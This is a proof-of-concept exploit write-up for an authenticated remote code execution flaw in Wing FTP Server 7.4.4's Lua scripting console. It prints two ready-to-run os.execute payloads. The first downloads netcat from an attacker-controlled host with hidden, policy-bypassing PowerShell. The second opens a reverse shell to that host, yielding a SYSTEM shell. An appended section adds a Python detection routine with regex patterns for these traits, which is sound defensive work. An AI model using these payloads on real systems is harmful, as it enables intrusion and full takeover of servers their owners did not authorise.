# Wing FTP Server 7.4.4 - Remote Code Execution (Authenticated) (CVE-2025-5196)
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.
Affected Version: Wing FTP Server 7.4.4 (Windows) | Authentication Required: Yes
---
# Download & Release Notes
As of May 24, 2025, the latest version of the application provided by the vendor can be downloaded from: https://www.wftpserver.com/download.htm
As of the same date, the vendor has published a release note stating that the RCE vulnerability was fixed in version 7.4.4. The release notes are available here: https://www.wftpserver.com/serverhistory.htm

---
# PoC
PoC for CVE-2025-5196; see the [VulDB](https://vuldb.com/?id.310279) entry.

Screenshot: Wing FTP Server Web Interface


Both payloads are Lua statements entered in the administrative scripting console; `os.execute()` runs them with the privileges of the Wing FTP Server service. The first piece of the command downloads nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part executes `nc.exe 192.168.234.131 4443 -e cmd.exe`.
```lua
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
```
```lua
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
```

Screenshot: NT/SYSTEM Shell
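Added example, not part of the original PoC: detection logic for the behaviour shown above, run over constructed process-creation events in a Sysmon Event ID 1 shape. It flags a shell spawned directly by the Wing FTP Server service process (what `os.execute()` from the console looks like on the host) and scores the command-line traits the two payloads use; the service image name `wftpserver.exe` and the sample events are assumptions.

```python
import re

# Assumption: the Wing FTP Server service binary is named wftpserver.exe.
FTP_SERVICE_IMAGES = {"wftpserver.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line traits used by the PoC payloads: execution-policy bypass,
# hidden window, download cradle, netcat reverse shell.
SUSPICIOUS_ARGS = [
    (re.compile(r"-exec(?:utionpolicy)?\s+bypass", re.I), "exec-bypass"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden-window"),
    (re.compile(r"downloadfile|downloadstring|invoke-webrequest", re.I), "download-cradle"),
    (re.compile(r"\bnc(?:64)?\.exe\b.*-e\b.{0,8}cmd\.exe", re.I), "nc-reverse-shell"),
]

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> tuple[str, list[str]]:
    """Return ("alert" | "suspicious" | "ok", reasons) for one process-creation event."""
    parent, child = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    hits = [label for pat, label in SUSPICIOUS_ARGS if pat.search(event.get("CommandLine", ""))]
    # A shell spawned directly by the FTP service is what os.execute() from the
    # admin console looks like on the host: alert regardless of the arguments.
    if parent in FTP_SERVICE_IMAGES and child in SHELL_IMAGES:
        return "alert", ["ftp-service-spawned-shell"] + hits
    # Elsewhere require two independent traits, so a lone -ExecutionPolicy Bypass
    # from a scheduled admin script does not page anyone.
    if len(hits) >= 2:
        return "suspicious", hits
    return "ok", hits

# Constructed sample events in a Sysmon Event ID 1 shape; the first two mirror the
# PoC's two os.execute() payloads, the last two are ordinary admin activity.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EVENTS = [
    {"ParentImage": r"C:\Program Files\Wing FTP Server\wftpserver.exe", "Image": PS,
     "CommandLine": r'''powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile('http://192.168.234.131:8000/nc.exe', 'C:\Users\usuario\Desktop\Drops\nc.exe')"'''},
    {"ParentImage": r"C:\Program Files\Wing FTP Server\wftpserver.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'''cmd /c powershell -NoP -W Hidden -Command "Start-Process \"C:\Users\usuario\Desktop\Drops\nc.exe\" -ArgumentList \"192.168.234.131\",\"4443\",\"-e\",\"cmd.exe\""'''},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -NoProfile -Command Get-Date"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for event in EVENTS:
        verdict, reasons = classify(event)
        print(f"{verdict:10s} {basename(event['ParentImage'])} -> {basename(event['Image'])} {reasons}")
```

The parent/child pairing is the durable signal: payload strings change, but the FTP service has no legitimate reason to spawn a shell.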
